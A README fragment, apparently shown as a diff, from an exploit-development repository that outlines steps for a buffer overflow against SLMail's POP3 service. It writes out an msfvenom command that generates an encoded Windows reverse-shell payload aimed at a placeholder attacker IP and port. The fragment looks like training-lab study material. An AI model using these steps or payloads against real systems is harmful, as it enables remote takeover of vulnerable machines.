Gandosha/ExpDev/README.md

 * Edit the exploit and add this address instead of EIP (B's) place (See slmail_pop3_return_address.py in repo)
 * Place a breakpoint in this address and check it actually reaches it.
 * Generate a shellcode using MSFVENOM (msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKERS_IP> LPORT=<ATTACKERS_PORT> -f c -a x86 --platform windows -e x86/shikata_ga_nai -b "<BAD_CHARS>" (ex. "\x00\x0a\x0d")).
-* Place this shellcode in the exploit POC (See
+* Place this shellcode in the exploit POC and make sure to add NOP as padding for the decoder (See slmail_pop3_shellcode.py in repo).